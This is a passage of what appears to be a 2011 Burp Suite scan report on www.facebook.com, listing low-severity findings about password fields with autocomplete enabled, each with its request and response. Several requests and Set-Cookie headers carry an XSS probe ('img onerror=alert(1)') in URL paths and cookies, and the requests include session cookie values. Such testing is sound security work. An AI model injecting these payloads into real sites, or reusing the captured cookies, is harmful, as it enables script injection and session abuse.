Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; wd=1022x1007

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.96.57
X-Cnection: close
Date: Thu, 05 May 2011 11:56:38 GMT
Content-Length: 11260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.7. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; wd=1022x1007

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.102.67
X-Cnection: close
Date: Thu, 05 May 2011 11:56:26 GMT
Content-Length: 11478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.8. http://www.facebook.com/2008/fbml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.67
Connection: close
Date: Thu, 05 May 2011 11:40:11 GMT
Content-Length: 11283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.9. http://www.facebook.com/AOLrealestate

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /AOLrealestate

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /AOLrealestate HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.29
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 37726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.10. http://www.facebook.com/BPAmerica

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /BPAmerica

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /BPAmerica HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.217.127
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 183008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.11. http://www.facebook.com/DailyFinance

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /DailyFinance

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /DailyFinance HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.69
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 197840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.12. http://www.facebook.com/HockeyKen

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /HockeyKen

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /HockeyKen HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.39
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 79629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.13. http://www.facebook.com/KickIceForever

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /KickIceForever

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /KickIceForever HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.43
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 72255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.14. http://www.facebook.com/LadyBonesie

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /LadyBonesie

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /LadyBonesie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.167.61
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 14829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.15. http://www.facebook.com/Loizza

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /Loizza

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /Loizza HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.69
Connection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 228078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.16. http://www.facebook.com/aim

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aim

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /aim HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.37
Connection: close
Date: Thu, 05 May 2011 11:40:16 GMT
Content-Length: 170476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.17. http://www.facebook.com/ajax/intl/language_dialog.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.123
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Content-Length: 41058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.18. http://www.facebook.com/aol

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aol

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /aol HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
